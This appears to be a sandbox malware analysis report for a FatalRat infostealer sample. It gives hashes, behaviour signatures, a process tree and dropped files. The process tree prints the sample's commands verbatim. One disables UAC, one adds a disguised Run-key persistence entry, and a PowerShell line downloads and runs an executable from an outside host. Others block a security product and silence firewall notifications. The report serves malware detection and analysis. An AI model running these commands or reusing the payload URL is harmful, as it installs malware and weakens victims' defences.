Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    141s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/02/2025, 12:41

General

  • Target

    2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe

  • Size

    20.0MB

  • MD5

    f999f60afb55137a3c068a707a421a5f

  • SHA1

    15f5a8d7930cef9479caf9ecc2dd2c2d8f1efb32

  • SHA256

    b17337db64b6ab60e969cec89c36058baf5e100c25684bda9beb0afa1c342b4d

  • SHA512

    24a7ffcec017937eec514a2bf2d1d36632abb829ece9fe59c63decb4c07e52f3a0ae8d09c8e7f61fa0f7fa1ecef5fdae8702ab48a09266391969fb71b85fbe4c

  • SSDEEP

    196608:patpgF2oM7Vk96Cy8xEqn0SweKG8UvMGnsOTMk:otpgF2oM7Vk96Cy8xEqn0MlDvtnsO4

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://baba-1336130708.cos.ap-tokyo.myqcloud.com/tsetup-x64.5.11.1.exe

Signatures

  • FatalRat

    FatalRat is a modular infostealer family written in C++ first appearing in June 2021.

  • Fatalrat family
  • UAC bypass 3 TTPs 1 IoCs
  • Fatal Rat payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file 1 IoCs
  • Modifies Windows Firewall 2 TTPs 8 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 24 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies registry class 33 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:396
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\20250223024202\1.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4412
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • UAC bypass
        PID:2056
    • C:\programdata\20250223024202\Agghosts.exe
      "C:\programdata\20250223024202\Agghosts.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5056
    • C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f
      2⤵
      • Adds Run key to start application
      PID:5048
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Videos\download_and_run.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1500
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
          PID:2928
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://baba-1336130708.cos.ap-tokyo.myqcloud.com/tsetup-x64.5.11.1.exe', 'C:\Users\Public\Videos\bin.exe')"
          3⤵
          • Blocklisted process makes network request
          • Downloads MZ/PE file
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1580
        • C:\Users\Public\Videos\bin.exe
          "C:\Users\Public\Videos\bin.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4084
          • C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp
            "C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp" /SL5="$1301F8,46193823,827904,C:\Users\Public\Videos\bin.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:1712
            • C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe
              "C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops desktop.ini file(s)
              • Enumerates system info in registry
              • Modifies registry class
              • Suspicious behavior: AddClipboardFormatListener
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of SetWindowsHookEx
              PID:1920
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\20250223024202\fhq.bat" "
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2524
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="Block Program Network Access" dir=in action=block program="" enable=yes
          3⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          PID:4544
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="Block Program Network Access" dir=out action=block program="" enable=yes
          3⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          PID:4556
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="Block Program Network Access2" dir=in action=block program="safemon\360tray.exe=360Safe.exe" enable=yes
          3⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          PID:4832
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="Block Program Network Access2" dir=out action=block program="safemon\360tray.exe=360Safe.exe" enable=yes
          3⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          PID:3936
        • C:\Windows\system32\netsh.exe
          netsh advfirewall set allprofiles state on
          3⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          PID:3316
        • C:\Windows\system32\netsh.exe
          netsh advfirewall set privateprofile settings inboundusernotification disable
          3⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          PID:2792
        • C:\Windows\system32\netsh.exe
          netsh advfirewall set publicprofile settings inboundusernotification disable
          3⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          PID:3968
        • C:\Windows\system32\netsh.exe
          netsh advfirewall set domainprofile settings inboundusernotification disable
          3⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          PID:2380

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\20250223024202\Agghosts.exe

      Filesize

      2.7MB

      MD5

      2a24dcd41bc3c5b5f7eceda525786578

      SHA1

      7e898f9ee5a97a1a261326f0168e8de44dcf8af4

      SHA256

      169e9e4b23878035551455f4e5dbd01ece204e59fe75361680e8786998059ca7

      SHA512

      aaded4c72d3fa77eefd9d4b098288dd6923bd79813466d93313d6acb00fea9bb90248fff92cc89a625c60ae3b7cc1c27e8bb178fdac624ec896267da57b9fd6a

    • C:\ProgramData\lnk\2.lnk

      Filesize

      1KB

      MD5

      97dd1e75e3378d3e5f4cb676787df4c5

      SHA1

      9050ff87b70c2d534c1218113a3f5e3d971b4d90

      SHA256

      fc567936880543449bfc3c148219e3332db05554a2bfee030cade8f0ecc6b4ee

      SHA512

      acf35d67939ff0281e66b1b281197a815eb932b79c18d121ec68a366509fd3aade0bde257ba0d22e9396b172d2a6915cc000a2e961fa701e9586b09d46e17655

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h1zfqu1i.rz5.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp

      Filesize

      3.2MB

      MD5

      2e90747fe82d7271fbe97ea022fd5173

      SHA1

      6164bc0ec0c908e9159a0c5d558945d7974e11c1

      SHA256

      bbec6b26c13b8ebfd01789a8248c6a45646134daf1ef998dbb885ec59157e6b4

      SHA512

      d9a797861f8a7fc966a0a00e1719734a23c95c39aca9d70322d09274119267c8bd0d86a3ec468a7f493422769f89a48469f1e33a6a1dd2d39cb30cfb4df6fa44

    • C:\Users\Admin\AppData\Roaming\Telegram Desktop\modules\x64\d3d\d3dcompiler_47.dll

      Filesize

      4.7MB

      MD5

      a7349236212b0e5cec2978f2cfa49a1a

      SHA1

      5abb08949162fd1985b89ffad40aaf5fc769017e

      SHA256

      a05d04a270f68c8c6d6ea2d23bebf8cd1d5453b26b5442fa54965f90f1c62082

      SHA512

      c7ff4f9146fefedc199360aa04236294349c881b3865ebc58c5646ad6b3f83fca309de1173f5ebf823a14ba65e5ada77b46f20286d1ea62c37e17adbc9a82d02

    • C:\Users\Public\Downloads\20250223024202\1.bat

      Filesize

      229B

      MD5

      fa42ebb1071abc0e618c296ea2cf71a6

      SHA1

      9e0c0737b0e37b3e821d011eecd9b0c7c9f2a15a

      SHA256

      395f835731d25803a791db984062dd5cfdcade6f95cc5d0f68d359af32f6258d

      SHA512

      0ed9919675c224201996caeeecf625a1db00a70af5d3ba135dc3d6fa16bfcc562426c813e21b4e861f04d312635be3528d79b5c49b23e78161f2b051fa9aaf05

    • C:\Users\Public\Downloads\20250223024202\fhq.bat

      Filesize

      1KB

      MD5

      3a7cb580bd340505f6dc5b4c829a3eca

      SHA1

      21cc730517d74fa1d13316d7e0d817f3bd710906

      SHA256

      1c1528b546aa29be6614707cbe408cb4b46e8ed05bf3fe6b388b9f22a4ee37e2

      SHA512

      c224fa676542b90f8fc990e574028af664dced61612855290fb23ce4acad2d6b9043e901365939106b591b6746b3e4ddada15eede88a947051e9d8083194e630

    • C:\Users\Public\Videos\bin.exe

      Filesize

      45.0MB

      MD5

      06eaa3263801f4d695c3727834ffbca5

      SHA1

      58031db0039cf00a1fe738e55ee2fca35558c4fd

      SHA256

      97969d6e01ee37a16f4f7f64e6166f169bedfe95190f48d426693d4b95e8e8ff

      SHA512

      7b03899c6ce403172eb6d159e142b8ac25ef3aa6eb7f56abd205657d13832eb5b8ee61408b8d7a6f3f1c57de7fcc2565ce2ce9ecb4e54611f4c48098a870b6b3

    • C:\Users\Public\Videos\download_and_run.bat

      Filesize

      415B

      MD5

      a90ccfd040d774b547f7d258b8e03661

      SHA1

      c46e353d34723f9393482974a516d51dfb52440d

      SHA256

      d852cfc4107e9ce5bec7349ef180366bbb4fe0878e725325a2b844f93a1ac1e2

      SHA512

      bdc816781c44b6e9bbc8207a3c0466a45397cf7815f267add21abe243bf138b5bae7ffec867433bf249e139b726413f68b7002f541c89ae1a25bd1e6980abfd7

    • C:\programdata\20250223024202\Ensup.log

      Filesize

      192KB

      MD5

      2fd94f6e1d71454d716a126f0d7450ac

      SHA1

      5d966df95c741880089e9078af921a22216516ec

      SHA256

      a599cbb05b69328655a7a0afc2644ed607c30a05edfb8fd6be2ea920c25b54b5

      SHA512

      340107b69fc49b8fe1acf37a3a6e40c4b7206cf3ae069fea6f4ba702a733401e1feef55e1d858b3529764bcd0ba371ef552f5838444b65b62545e1da150f9bb2

    • C:\programdata\20250223024202\libcef.dll

      Filesize

      1.9MB

      MD5

      b7f8c3416cdfd6f46c790da064f66099

      SHA1

      d7ae9a3d49bbf1981e7d6604128e18b6cd160bd6

      SHA256

      b9edf03447cf402e24da384c146c9d1536871a47518c795c4aea6550e3abd94d

      SHA512

      24272954e57f4f4f81dad90469e84946549e3441ba599f8b819d069b803687b3da35f449c0f18755352dba208d6d63af1d6b53c0a56adbd36540b1537bb99dc7

    • memory/396-13-0x000001E44B980000-0x000001E44B981000-memory.dmp

      Filesize

      4KB

    • memory/396-62-0x0000000140000000-0x0000000140419000-memory.dmp

      Filesize

      4.1MB

    • memory/396-11-0x0000000140000000-0x0000000140419000-memory.dmp

      Filesize

      4.1MB

    • memory/396-14-0x0000000140000000-0x0000000140419000-memory.dmp

      Filesize

      4.1MB

    • memory/396-12-0x000001E44BF00000-0x000001E44C314000-memory.dmp

      Filesize

      4.1MB

    • memory/1580-70-0x0000023494020000-0x0000023494042000-memory.dmp

      Filesize

      136KB

    • memory/1712-126-0x0000000000150000-0x0000000000487000-memory.dmp

      Filesize

      3.2MB

    • memory/1712-94-0x0000000000150000-0x0000000000487000-memory.dmp

      Filesize

      3.2MB

    • memory/1712-96-0x0000000000150000-0x0000000000487000-memory.dmp

      Filesize

      3.2MB

    • memory/1712-105-0x0000000000150000-0x0000000000487000-memory.dmp

      Filesize

      3.2MB

    • memory/4084-86-0x00000000002E0000-0x00000000003B8000-memory.dmp

      Filesize

      864KB

    • memory/4084-93-0x00000000002E0000-0x00000000003B8000-memory.dmp

      Filesize

      864KB

    • memory/4084-127-0x00000000002E0000-0x00000000003B8000-memory.dmp

      Filesize

      864KB

    • memory/5056-63-0x0000000002BF0000-0x0000000002C19000-memory.dmp

      Filesize

      164KB